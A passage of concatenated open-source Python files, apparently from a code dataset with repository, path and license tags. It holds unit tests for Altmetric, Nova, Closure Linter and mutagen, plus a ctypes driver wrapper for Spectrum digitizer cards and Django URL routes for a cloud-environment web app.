def _get_cpu_iowait_time(self, **kwargs): """Return CPU I/O wait time and its timestamp.""" return None, None def _get_cpu_user_percent(self, **kwargs): """Return CPU user mode percentage and its timestamp.""" return None, None def _get_cpu_kernel_percent(self, **kwargs): """Return CPU kernel percentage and its timestamp.""" return None, None def _get_cpu_idle_percent(self, **kwargs): """Return CPU idle percentage and its timestamp.""" return None, None def _get_cpu_iowait_percent(self, **kwargs): """Return CPU I/O wait percentage and its timestamp.""" return None, None def _get_cpu_percent(self, **kwargs): """Return generic CPU utilization and its timestamp.""" return None, None
apache-2.0
Impactstory/total-impact-webapp
test/unit_tests/providers/test_altmetric_com.py
2
3833
from test.unit_tests.providers import common from test.unit_tests.providers.common import ProviderTestCase from totalimpact.providers.provider import Provider, ProviderContentMalformedError from test.utils import http import os import collections import pprint from nose.tools import assert_equals, assert_items_equal, raises, nottest datadir = os.path.join(os.path.split(__file__)[0], "../../../extras/sample_provider_pages/altmetric_com") SAMPLE_EXTRACT_ALIASES_PAGE = os.path.join(datadir, "aliases") SAMPLE_EXTRACT_METRICS_PAGE = os.path.join(datadir, "metrics") SAMPLE_EXTRACT_METRICS_PAGE_EXTENDED = os.path.join(datadir, "sample.json") TEST_ID = "10.1101/gr.161315.113" class TestAltmetric_Com(ProviderTestCase): provider_name = "altmetric_com" testitem_aliases = ("doi", TEST_ID) testitem_metrics = ("doi", TEST_ID) def setUp(self): ProviderTestCase.setUp(self) def test_is_relevant_alias(self): # ensure that it matches an appropriate ids assert_equals(self.provider.is_relevant_alias(self.testitem_aliases), True) def test_extract_aliases_success(self): f = open(SAMPLE_EXTRACT_ALIASES_PAGE, "r") good_page = f.read() aliases_list = self.provider._extract_aliases(good_page) expected = [('altmetric_com', '1870595')] assert_equals(aliases_list, expected) def test_extract_metrics_success_via_fetch(self): f = open(SAMPLE_EXTRACT_METRICS_PAGE_EXTENDED, "r") good_page = f.read() metrics_dict = self.provider._extract_metrics_via_fetch(good_page) print metrics_dict.keys() expected_keys = ['altmetric_com:demographics', 'altmetric_com:tweets', 'altmetric_com:unique_tweeters', 'altmetric_com:posts'] assert_items_equal(expected_keys, metrics_dict.keys()) assert_equals(metrics_dict["altmetric_com:tweets"], 2235) def test_provenance_url(self): provenance_url = self.provider.provenance_url("tweets", [self.testitem_aliases]) expected = "" assert_equals(provenance_url, expected) provenance_url = self.provider.provenance_url("tweets", [self.testitem_aliases, ("altmetric_com", "1870595")]) 
expected = 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org' assert_equals(provenance_url, expected) @http def test_aliases(self): aliases = self.provider.aliases([self.testitem_aliases]) print aliases expected = [('altmetric_com', '1870595')] assert_equals(aliases, expected) @http def test_metrics(self): metrics_dict = self.provider.metrics([("altmetric_com", "1870595")]) expected = {'altmetric_com:gplus_posts': (1, 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org'), 'altmetric_com:facebook_posts': (1, 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org'), 'altmetric_com:tweets': (55, 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org'), 'altmetric_com:blog_posts': (2, 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org')} print metrics_dict for key in expected: assert metrics_dict[key][0] >= expected[key][0], [key, metrics_dict[key], expected[key]] assert metrics_dict[key][1] == expected[key][1], [key, metrics_dict[key], expected[key]] def test_provider_aliases_400(self): pass def test_provider_aliases_500(self): pass def test_provider_metrics_400(self): pass def test_provider_metrics_500(self): pass def test_provider_metrics_empty(self): pass def test_provider_metrics_nonsense_txt(self): pass def test_provider_metrics_nonsense_xml(self): pass
mit
vdrhtc/Measurement-automation
drivers/pyspcm.py
1
7735
import os import platform import sys from ctypes import * # load registers for easier access from drivers.py_header.regs import * # load registers for easier access from drivers.py_header.spcerr import * SPCM_DIR_PCTOCARD = 0 SPCM_DIR_CARDTOPC = 1 SPCM_BUF_DATA = 1000 # main data buffer for acquired or generated samples SPCM_BUF_ABA = 2000 # buffer for ABA data, holds the A-DATA (slow samples) SPCM_BUF_TIMESTAMP = 3000 # buffer for timestamps # determine bit width of os oPlatform = platform.architecture() if (oPlatform[0] == '64bit'): bIs64Bit = 1 else: bIs64Bit = 0 # define pointer aliases int8 = c_int8 int16 = c_int16 int32 = c_int32 int64 = c_int64 ptr8 = POINTER (int8) ptr16 = POINTER (int16) ptr32 = POINTER (int32) ptr64 = POINTER (int64) uint8 = c_uint8 uint16 = c_uint16 uint32 = c_uint32 uint64 = c_uint64 uptr8 = POINTER (uint8) uptr16 = POINTER (uint16) uptr32 = POINTER (uint32) uptr64 = POINTER (uint64) # Windows if os.name == 'nt': #sys.stdout.write("Python Version: {0} on Windows\n\n".format ( # platform.python_version())) # define card handle type if (bIs64Bit): # for unknown reasons c_void_p gets messed up on Win7/64bit, but this works: drv_handle = POINTER(c_uint64) else: drv_handle = c_void_p # Load DLL into memory. 
# use windll because all driver access functions use _stdcall calling convention under windows if (bIs64Bit == 1): spcmDll = windll.LoadLibrary ("c:\\windows\\system32\\spcm_win64.dll") else: spcmDll = windll.LoadLibrary ("c:\\windows\\system32\\spcm_win32.dll") # load spcm_hOpen if (bIs64Bit): spcm_hOpen = getattr (spcmDll, "spcm_hOpen") else: spcm_hOpen = getattr (spcmDll, "_spcm_hOpen@4") spcm_hOpen.argtype = [c_char_p] spcm_hOpen.restype = drv_handle # load spcm_vClose if (bIs64Bit): spcm_vClose = getattr (spcmDll, "spcm_vClose") else: spcm_vClose = getattr (spcmDll, "_spcm_vClose@4") spcm_vClose.argtype = [drv_handle] spcm_vClose.restype = None # load spcm_dwGetErrorInfo if (bIs64Bit): spcm_dwGetErrorInfo_i32 = getattr (spcmDll, "spcm_dwGetErrorInfo_i32") else: spcm_dwGetErrorInfo_i32 = getattr (spcmDll, "_spcm_dwGetErrorInfo_i32@16") spcm_dwGetErrorInfo_i32.argtype = [drv_handle, uptr32, ptr32, c_char_p] spcm_dwGetErrorInfo_i32.restype = uint32 # load spcm_dwGetParam_i32 if (bIs64Bit): spcm_dwGetParam_i32 = getattr (spcmDll, "spcm_dwGetParam_i32") else: spcm_dwGetParam_i32 = getattr (spcmDll, "_spcm_dwGetParam_i32@12") spcm_dwGetParam_i32.argtype = [drv_handle, int32, ptr32] spcm_dwGetParam_i32.restype = uint32 # load spcm_dwGetParam_i64 if (bIs64Bit): spcm_dwGetParam_i64 = getattr (spcmDll, "spcm_dwGetParam_i64") else: spcm_dwGetParam_i64 = getattr (spcmDll, "_spcm_dwGetParam_i64@12") spcm_dwGetParam_i64.argtype = [drv_handle, int32, ptr64] spcm_dwGetParam_i64.restype = uint32 # load spcm_dwSetParam_i32 if (bIs64Bit): spcm_dwSetParam_i32 = getattr (spcmDll, "spcm_dwSetParam_i32") else: spcm_dwSetParam_i32 = getattr (spcmDll, "_spcm_dwSetParam_i32@12") spcm_dwSetParam_i32.argtype = [drv_handle, int32, int32] spcm_dwSetParam_i32.restype = uint32 # load spcm_dwSetParam_i64 if (bIs64Bit): spcm_dwSetParam_i64 = getattr (spcmDll, "spcm_dwSetParam_i64") else: spcm_dwSetParam_i64 = getattr (spcmDll, "_spcm_dwSetParam_i64@16") spcm_dwSetParam_i64.argtype = 
[drv_handle, int32, int64] spcm_dwSetParam_i64.restype = uint32 # load spcm_dwSetParam_i64m if (bIs64Bit): spcm_dwSetParam_i64m = getattr (spcmDll, "spcm_dwSetParam_i64m") else: spcm_dwSetParam_i64m = getattr (spcmDll, "_spcm_dwSetParam_i64m@16") spcm_dwSetParam_i64m.argtype = [drv_handle, int32, int32, int32] spcm_dwSetParam_i64m.restype = uint32 # load spcm_dwDefTransfer_i64 if (bIs64Bit): spcm_dwDefTransfer_i64 = getattr (spcmDll, "spcm_dwDefTransfer_i64") else: spcm_dwDefTransfer_i64 = getattr (spcmDll, "_spcm_dwDefTransfer_i64@36") spcm_dwDefTransfer_i64.argtype = [drv_handle, uint32, uint32, uint32, c_void_p, uint64, uint64] spcm_dwDefTransfer_i64.restype = uint32 # load spcm_dwInvalidateBuf if (bIs64Bit): spcm_dwInvalidateBuf = getattr (spcmDll, "spcm_dwInvalidateBuf") else: spcm_dwInvalidateBuf = getattr (spcmDll, "_spcm_dwInvalidateBuf@8") spcm_dwInvalidateBuf.argtype = [drv_handle, uint32] spcm_dwInvalidateBuf.restype = uint32 # load spcm_dwGetContBuf_i64 if (bIs64Bit): spcm_dwGetContBuf_i64 = getattr (spcmDll, "spcm_dwGetContBuf_i64") else: spcm_dwGetContBuf_i64 = getattr (spcmDll, "_spcm_dwGetContBuf_i64@16") spcm_dwGetContBuf_i64.argtype = [drv_handle, uint32, POINTER(c_void_p), uptr64] spcm_dwGetContBuf_i64.restype = uint32 elif os.name == 'posix': sys.stdout.write("Python Version: {0} on Linux\n\n".format (platform.python_version())) # define card handle type if (bIs64Bit): drv_handle = POINTER(c_uint64) else: drv_handle = c_void_p # Load DLL into memory. 
# use cdll because all driver access functions use cdecl calling convention under linux spcmDll = cdll.LoadLibrary ("libspcm_linux.so") # load spcm_hOpen spcm_hOpen = getattr (spcmDll, "spcm_hOpen") spcm_hOpen.argtype = [c_char_p] spcm_hOpen.restype = drv_handle # load spcm_vClose spcm_vClose = getattr (spcmDll, "spcm_vClose") spcm_vClose.argtype = [drv_handle] spcm_vClose.restype = None # load spcm_dwGetErrorInfo spcm_dwGetErrorInfo_i32 = getattr (spcmDll, "spcm_dwGetErrorInfo_i32") spcm_dwGetErrorInfo_i32.argtype = [drv_handle, uptr32, ptr32, c_char_p] spcm_dwGetErrorInfo_i32.restype = uint32 # load spcm_dwGetParam_i32 spcm_dwGetParam_i32 = getattr (spcmDll, "spcm_dwGetParam_i32") spcm_dwGetParam_i32.argtype = [drv_handle, int32, ptr32] spcm_dwGetParam_i32.restype = uint32 # load spcm_dwGetParam_i64 spcm_dwGetParam_i64 = getattr (spcmDll, "spcm_dwGetParam_i64") spcm_dwGetParam_i64.argtype = [drv_handle, int32, ptr64] spcm_dwGetParam_i64.restype = uint32 # load spcm_dwSetParam_i32 spcm_dwSetParam_i32 = getattr (spcmDll, "spcm_dwSetParam_i32") spcm_dwSetParam_i32.argtype = [drv_handle, int32, int32] spcm_dwSetParam_i32.restype = uint32 # load spcm_dwSetParam_i64 spcm_dwSetParam_i64 = getattr (spcmDll, "spcm_dwSetParam_i64") spcm_dwSetParam_i64.argtype = [drv_handle, int32, int64] spcm_dwSetParam_i64.restype = uint32 # load spcm_dwSetParam_i64m spcm_dwSetParam_i64m = getattr (spcmDll, "spcm_dwSetParam_i64m") spcm_dwSetParam_i64m.argtype = [drv_handle, int32, int32, int32] spcm_dwSetParam_i64m.restype = uint32 # load spcm_dwDefTransfer_i64 spcm_dwDefTransfer_i64 = getattr (spcmDll, "spcm_dwDefTransfer_i64") spcm_dwDefTransfer_i64.argtype = [drv_handle, uint32, uint32, uint32, c_void_p, uint64, uint64] spcm_dwDefTransfer_i64.restype = uint32 # load spcm_dwInvalidateBuf spcm_dwInvalidateBuf = getattr (spcmDll, "spcm_dwInvalidateBuf") spcm_dwInvalidateBuf.argtype = [drv_handle, uint32] spcm_dwInvalidateBuf.restype = uint32 # load spcm_dwGetContBuf_i64 
spcm_dwGetContBuf_i64 = getattr (spcmDll, "spcm_dwGetContBuf_i64") spcm_dwGetContBuf_i64.argtype = [drv_handle, uint32, POINTER(c_void_p), uptr64] spcm_dwGetContBuf_i64.restype = uint32 else: raise Exception ('Operating system not supported by pySpcm')
gpl-3.0
Dev-Cloud-Platform/Dev-Cloud
dev_cloud/web_service/urls/user/environment.py
1
5340
# -*- coding: utf-8 -*- # @COPYRIGHT_begin # # Copyright [2015] Michał Szczygieł, M4GiK Software # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # @COPYRIGHT_end from django.conf.urls import patterns, url, include from core.utils.decorators import user_permission, vm_permission from web_service.views.user.enviroment import wizard_setup, generate_dependencies, customize_environment, \ define_environment, summary, validation_process, validation_process_ip, validation_process_resources, \ validation_process_ip_pre, view_environment, environments_list, get_vm_status, destroy_vm, refresh_vm_tasks, \ show_vnc, get_cpu_load, get_ssh_key, view_predefined, customize_predefined_environment, \ define_predefined_environment main_patterns = patterns('web_service.views.user.enviroment', url(r'^app/create/environment/$', user_permission(wizard_setup), name='personalized_environment'), url(r'^app/create/environment/technology/(?P<technology>\w+)/$', user_permission(generate_dependencies), name='generate_dependencies'), url( r'^app/create/environment/customize/(?P<technology>\w+)/(?P<application>[\w\-]+)/(?P<operation>\w+)/$', user_permission(customize_environment), name='customize_environment'), url(r'^app/create/environment/define/(?P<technology>\w+)/(?P<exposed_ip>\w+)/$', user_permission(define_environment), name='define_environment'), url(r'^app/create/environment/summary/$', user_permission(summary), name='summary'), 
url(r'^app/create/environment/validation_process/(?P<template>\w+)/(?P<exposed_ip>\w+)/$', user_permission(validation_process), name='validation_process'), url(r'^app/create/environment/validation_process_ip/(?P<exposed_ip>\w+)/$', user_permission(validation_process_ip), name='validation_process_ip'), url(r'^app/create/environment/validation_process_ip_pre/(?P<exposed_ip>\w+)/$', user_permission(validation_process_ip_pre), name='validation_process_ip_pre'), url(r'^app/create/environment/validation_process_resources/(?P<template_id>\w+)/$', user_permission(validation_process_resources), name='validation_process_resources'), url(r'^app/environments/$', user_permission(environments_list), name='environments_list'), url(r'^app/environments/(?P<destroy_status>\w+)/$', user_permission(environments_list), name='environments_list'), url(r'^app/environments/show_vm/(?P<vm_id>\w+)/$', vm_permission(view_environment), name='view_environment'), url(r'^app/environments/vm_status/(?P<vm_id>\w+)/$', vm_permission(get_vm_status), name='get_vm_status'), url(r'^app/environments/destroy/(?P<vm_id>\w+)/$', vm_permission(destroy_vm), name='destroy_vm'), url(r'^app/environments/refresh_tasks/(?P<vm_id>\w+)/$', vm_permission(refresh_vm_tasks), name='refresh_vm_tasks'), url(r'^app/environments/show_vm/vnc/(?P<vm_id>\w+)/$', vm_permission(show_vnc), name='show_vnc'), url(r'^app/environments/show_vm/cpu_load/(?P<vm_id>\w+)/$', vm_permission(get_cpu_load), name='get_cpu_load'), url(r'^app/environments/show_vm/get_ssh_key/(?P<vm_id>\w+)/$', vm_permission(get_ssh_key), name='get_ssh_key'), url(r'^app/create/environment/predefined/$', user_permission(view_predefined), name='predefined_environment'), url( r'^app/create/environment/predefined/customize/(?P<application>[\w\-]+)/(?P<operation>\w+)/$', user_permission(customize_predefined_environment), name='customize_predefined_environment'), url( r'^app/create/environment/predefined/define/(?P<application>[\w\-]+)/(?P<exposed_ip>\w+)/$', 
user_permission(define_predefined_environment), name='define_predefined_environment')) urlpatterns = patterns('', url(r'^main/', include(main_patterns)))
apache-2.0
Yuriy-Leonov/nova
nova/tests/api/openstack/compute/contrib/test_flavor_swap.py
11
3422
# Copyright 2012 Nebula, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from lxml import etree import webob from nova.compute import flavors from nova.openstack.common import jsonutils from nova import test from nova.tests.api.openstack import fakes FAKE_FLAVORS = { 'flavor 1': { "flavorid": '1', "name": 'flavor 1', "memory_mb": '256', "root_gb": '10', "swap": 512, }, 'flavor 2': { "flavorid": '2', "name": 'flavor 2', "memory_mb": '512', "root_gb": '10', "swap": None, }, } #TOD(jogo) dedup these accross nova.api.openstack.contrib.test_flavor* def fake_flavor_get_by_flavor_id(flavorid, ctxt=None): return FAKE_FLAVORS['flavor %s' % flavorid] def fake_get_all_flavors_sorted_list(context=None, inactive=False, filters=None, sort_key='flavorid', sort_dir='asc', limit=None, marker=None): return [ fake_flavor_get_by_flavor_id(1), fake_flavor_get_by_flavor_id(2) ] class FlavorSwapTest(test.NoDBTestCase): content_type = 'application/json' prefix = '' def setUp(self): super(FlavorSwapTest, self).setUp() ext = ('nova.api.openstack.compute.contrib' '.flavor_swap.Flavor_swap') self.flags(osapi_compute_extension=[ext]) fakes.stub_out_nw_api(self.stubs) self.stubs.Set(flavors, "get_all_flavors_sorted_list", fake_get_all_flavors_sorted_list) self.stubs.Set(flavors, "get_flavor_by_flavor_id", fake_flavor_get_by_flavor_id) def _make_request(self, url): req = webob.Request.blank(url) req.headers['Accept'] = self.content_type res = req.get_response(fakes.wsgi_app()) return res def 
_get_flavor(self, body): return jsonutils.loads(body).get('flavor') def _get_flavors(self, body): return jsonutils.loads(body).get('flavors') def assertFlavorSwap(self, flavor, swap): self.assertEqual(str(flavor.get('%sswap' % self.prefix)), swap) def test_show(self): url = '/v2/fake/flavors/1' res = self._make_request(url) self.assertEqual(res.status_int, 200) self.assertFlavorSwap(self._get_flavor(res.body), '512') def test_detail(self): url = '/v2/fake/flavors/detail' res = self._make_request(url) self.assertEqual(res.status_int, 200) flavors = self._get_flavors(res.body) self.assertFlavorSwap(flavors[0], '512') self.assertFlavorSwap(flavors[1], '') class FlavorSwapXmlTest(FlavorSwapTest): content_type = 'application/xml' def _get_flavor(self, body): return etree.XML(body) def _get_flavors(self, body): return etree.XML(body).getchildren()
apache-2.0
yinquan529/platform-external-chromium_org
third_party/closure_linter/closure_linter/fixjsstyle_test.py
135
7371
#!/usr/bin/env python # # Copyright 2008 The Closure Linter Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Medium tests for the gpylint auto-fixer.""" __author__ = 'robbyw@google.com (Robby Walker)' import StringIO import gflags as flags import unittest as googletest from closure_linter import checker from closure_linter import error_fixer _RESOURCE_PREFIX = 'closure_linter/testdata' flags.FLAGS.strict = True flags.FLAGS.limited_doc_files = ('dummy.js', 'externs.js') flags.FLAGS.closurized_namespaces = ('goog', 'dummy') class FixJsStyleTest(googletest.TestCase): """Test case to for gjslint auto-fixing.""" def testFixJsStyle(self): test_cases = [['fixjsstyle.in.js', 'fixjsstyle.out.js'], ['indentation.js', 'fixjsstyle.indentation.out.js']] for [running_input_file, running_output_file] in test_cases: input_filename = None golden_filename = None current_filename = None try: input_filename = '%s/%s' % (_RESOURCE_PREFIX, running_input_file) current_filename = input_filename golden_filename = '%s/%s' % (_RESOURCE_PREFIX, running_output_file) current_filename = golden_filename except IOError, ex: raise IOError('Could not find testdata resource for %s: %s' % (current_filename, ex)) if running_input_file == 'fixjsstyle.in.js': with open(input_filename) as f: for line in f: # Go to last line. pass self.assertTrue(line == line.rstrip(), '%s file should not end ' 'with a new line.' % (input_filename)) # Autofix the file, sending output to a fake file. 
actual = StringIO.StringIO() style_checker = checker.JavaScriptStyleChecker( error_fixer.ErrorFixer(actual)) style_checker.Check(input_filename) # Now compare the files. actual.seek(0) expected = open(golden_filename, 'r') self.assertEqual(actual.readlines(), expected.readlines()) def testMissingExtraAndUnsortedRequires(self): """Tests handling of missing extra and unsorted goog.require statements.""" original = [ "goog.require('dummy.aa');", "goog.require('dummy.Cc');", "goog.require('dummy.Dd');", "", "var x = new dummy.Bb();", "dummy.Cc.someMethod();", "dummy.aa.someMethod();", ] expected = [ "goog.require('dummy.Bb');", "goog.require('dummy.Cc');", "goog.require('dummy.aa');", "", "var x = new dummy.Bb();", "dummy.Cc.someMethod();", "dummy.aa.someMethod();", ] self._AssertFixes(original, expected) def testMissingExtraAndUnsortedProvides(self): """Tests handling of missing extra and unsorted goog.provide statements.""" original = [ "goog.provide('dummy.aa');", "goog.provide('dummy.Cc');", "goog.provide('dummy.Dd');", "", "dummy.Cc = function() {};", "dummy.Bb = function() {};", "dummy.aa.someMethod = function();", ] expected = [ "goog.provide('dummy.Bb');", "goog.provide('dummy.Cc');", "goog.provide('dummy.aa');", "", "dummy.Cc = function() {};", "dummy.Bb = function() {};", "dummy.aa.someMethod = function();", ] self._AssertFixes(original, expected) def testNoRequires(self): """Tests positioning of missing requires without existing requires.""" original = [ "goog.provide('dummy.Something');", "", "dummy.Something = function() {};", "", "var x = new dummy.Bb();", ] expected = [ "goog.provide('dummy.Something');", "", "goog.require('dummy.Bb');", "", "dummy.Something = function() {};", "", "var x = new dummy.Bb();", ] self._AssertFixes(original, expected) def testNoProvides(self): """Tests positioning of missing provides without existing provides.""" original = [ "goog.require('dummy.Bb');", "", "dummy.Something = function() {};", "", "var x = new dummy.Bb();", ] 
expected = [ "goog.provide('dummy.Something');", "", "goog.require('dummy.Bb');", "", "dummy.Something = function() {};", "", "var x = new dummy.Bb();", ] self._AssertFixes(original, expected) def testGoogScopeIndentation(self): """Tests Handling a typical end-of-scope indentation fix.""" original = [ 'goog.scope(function() {', ' // TODO(brain): Take over the world.', '}); // goog.scope', ] expected = [ 'goog.scope(function() {', '// TODO(brain): Take over the world.', '}); // goog.scope', ] self._AssertFixes(original, expected) def testMissingEndOfScopeComment(self): """Tests Handling a missing comment at end of goog.scope.""" original = [ 'goog.scope(function() {', '});', ] expected = [ 'goog.scope(function() {', '}); // goog.scope', ] self._AssertFixes(original, expected) def testMissingEndOfScopeCommentWithOtherComment(self): """Tests handling an irrelevant comment at end of goog.scope.""" original = [ 'goog.scope(function() {', "}); // I don't belong here!", ] expected = [ 'goog.scope(function() {', '}); // goog.scope', ] self._AssertFixes(original, expected) def testMalformedEndOfScopeComment(self): """Tests Handling a malformed comment at end of goog.scope.""" original = [ 'goog.scope(function() {', '}); // goog.scope FTW', ] expected = [ 'goog.scope(function() {', '}); // goog.scope', ] self._AssertFixes(original, expected) def _AssertFixes(self, original, expected): """Asserts that the error fixer corrects original to expected.""" original = self._GetHeader() + original expected = self._GetHeader() + expected actual = StringIO.StringIO() style_checker = checker.JavaScriptStyleChecker( error_fixer.ErrorFixer(actual)) style_checker.CheckLines('testing.js', original, False) actual.seek(0) expected = [x + '\n' for x in expected] self.assertListEqual(actual.readlines(), expected) def _GetHeader(self): """Returns a fake header for a JavaScript file.""" return [ "// Copyright 2011 Google Inc. 
All Rights Reserved.", "", "/**", " * @fileoverview Fake file overview.", " * @author fake@google.com (Fake Person)", " */", "" ] if __name__ == '__main__': googletest.main()
bsd-3-clause
vahgar/mutagen
tests/test_easyid3.py
4
12780
import os import shutil import pickle from tests import TestCase from mutagen.id3 import ID3FileType, ID3 from mutagen.easyid3 import EasyID3, error as ID3Error from mutagen._compat import PY3 from tempfile import mkstemp class TEasyID3(TestCase): def setUp(self): fd, self.filename = mkstemp('.mp3') os.close(fd) empty = os.path.join('tests', 'data', 'emptyfile.mp3') shutil.copy(empty, self.filename) self.id3 = EasyID3() def test_remember_ctr(self): empty = os.path.join('tests', 'data', 'emptyfile.mp3') mp3 = ID3FileType(empty, ID3=EasyID3) self.failIf(mp3.tags) mp3["artist"] = ["testing"] self.failUnless(mp3.tags) mp3.pprint() self.failUnless(isinstance(mp3.tags, EasyID3)) def test_ignore_23(self): self.id3["date"] = "2004" self.id3.save(self.filename, v2_version=3) self.assertEqual(ID3(self.filename).version, (2, 4, 0)) def test_delete(self): self.id3["artist"] = "foobar" self.id3.save(self.filename) self.failUnless(os.path.getsize(self.filename)) self.id3.delete(self.filename) self.failIf(os.path.getsize(self.filename)) self.failIf(self.id3) def test_pprint(self): self.id3["artist"] = "baz" self.id3.pprint() def test_in(self): self.failIf("foo" in self.id3) if not PY3: def test_has_key(self): self.failIf(self.id3.has_key("foo")) def test_empty_file(self): empty = os.path.join('tests', 'data', 'emptyfile.mp3') self.assertRaises(ID3Error, EasyID3, filename=empty) def test_nonexistent_file(self): empty = os.path.join('tests', 'data', 'does', 'not', 'exist') self.assertRaises(IOError, EasyID3, filename=empty) def test_write_single(self): for key in EasyID3.valid_keys: if (key == "date") or (key == "originaldate"): continue elif key.startswith("replaygain_"): continue # Test creation self.id3[key] = "a test value" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3[key], ["a test value"]) self.failUnlessEqual(id3.keys(), [key]) # And non-creation setting. 
self.id3[key] = "a test value" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3[key], ["a test value"]) self.failUnlessEqual(id3.keys(), [key]) del(self.id3[key]) def test_write_double(self): for key in EasyID3.valid_keys: if (key == "date") or (key == "originaldate"): continue elif key.startswith("replaygain_"): continue elif key == "musicbrainz_trackid": continue self.id3[key] = ["a test", "value"] self.id3.save(self.filename) id3 = EasyID3(self.filename) # some keys end up in multiple frames and ID3.getall returns # them in undefined order self.failUnlessEqual(sorted(id3.get(key)), ["a test", "value"]) self.failUnlessEqual(id3.keys(), [key]) self.id3[key] = ["a test", "value"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(sorted(id3.get(key)), ["a test", "value"]) self.failUnlessEqual(id3.keys(), [key]) del(self.id3[key]) def test_write_date(self): self.id3["date"] = "2004" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["date"], ["2004"]) self.id3["date"] = "2004" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["date"], ["2004"]) def test_date_delete(self): self.id3["date"] = "2004" self.failUnlessEqual(self.id3["date"], ["2004"]) del(self.id3["date"]) self.failIf("date" in self.id3.keys()) def test_write_date_double(self): self.id3["date"] = ["2004", "2005"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["date"], ["2004", "2005"]) self.id3["date"] = ["2004", "2005"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["date"], ["2004", "2005"]) def test_write_original_date(self): self.id3["originaldate"] = "2004" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["originaldate"], ["2004"]) self.id3["originaldate"] = "2004" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["originaldate"], 
["2004"]) def test_original_date_delete(self): self.id3["originaldate"] = "2004" self.failUnlessEqual(self.id3["originaldate"], ["2004"]) del(self.id3["originaldate"]) self.failIf("originaldate" in self.id3.keys()) def test_write_original_date_double(self): self.id3["originaldate"] = ["2004", "2005"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["originaldate"], ["2004", "2005"]) self.id3["originaldate"] = ["2004", "2005"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["originaldate"], ["2004", "2005"]) def test_write_invalid(self): self.failUnlessRaises(ValueError, self.id3.__getitem__, "notvalid") self.failUnlessRaises(ValueError, self.id3.__delitem__, "notvalid") self.failUnlessRaises( ValueError, self.id3.__setitem__, "notvalid", "tests") def test_perfomer(self): self.id3["performer:coder"] = ["piman", "mu"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["performer:coder"], ["piman", "mu"]) def test_no_performer(self): self.failIf("performer:foo" in self.id3) def test_performer_delete(self): self.id3["performer:foo"] = "Joe" self.id3["performer:bar"] = "Joe" self.failUnless("performer:foo" in self.id3) self.failUnless("performer:bar" in self.id3) del(self.id3["performer:foo"]) self.failIf("performer:foo" in self.id3) self.failUnless("performer:bar" in self.id3) del(self.id3["performer:bar"]) self.failIf("performer:bar" in self.id3) self.failIf("TMCL" in self.id3._EasyID3__id3) def test_performer_delete_dne(self): self.failUnlessRaises(KeyError, self.id3.__delitem__, "performer:bar") self.id3["performer:foo"] = "Joe" self.failUnlessRaises(KeyError, self.id3.__delitem__, "performer:bar") def test_txxx_empty(self): # http://code.google.com/p/mutagen/issues/detail?id=135 self.id3["asin"] = "" def test_txxx_set_get(self): self.failIf("asin" in self.id3.keys()) self.id3["asin"] = "Hello" self.failUnless("asin" in self.id3.keys()) 
self.failUnlessEqual(self.id3["asin"], ["Hello"]) self.failUnless("TXXX:ASIN" in self.id3._EasyID3__id3) def test_txxx_del_set_del(self): self.failIf("asin" in self.id3.keys()) self.failUnlessRaises(KeyError, self.id3.__delitem__, "asin") self.id3["asin"] = "Hello" self.failUnless("asin" in self.id3.keys()) self.failUnlessEqual(self.id3["asin"], ["Hello"]) del(self.id3["asin"]) self.failIf("asin" in self.id3.keys()) self.failUnlessRaises(KeyError, self.id3.__delitem__, "asin") def test_txxx_save(self): self.id3["asin"] = "Hello" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["asin"], ["Hello"]) def test_txxx_unicode(self): self.id3["asin"] = u"He\u1234llo" self.failUnlessEqual(self.id3["asin"], [u"He\u1234llo"]) def test_bad_trackid(self): self.failUnlessRaises(ValueError, self.id3.__setitem__, "musicbrainz_trackid", ["a", "b"]) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_gain_bad_key(self): self.failIf("replaygain_foo_gain" in self.id3) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_gain_bad_value(self): self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_gain", []) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_gain", ["foo"]) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_gain", ["1", "2"]) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_peak_bad_key(self): 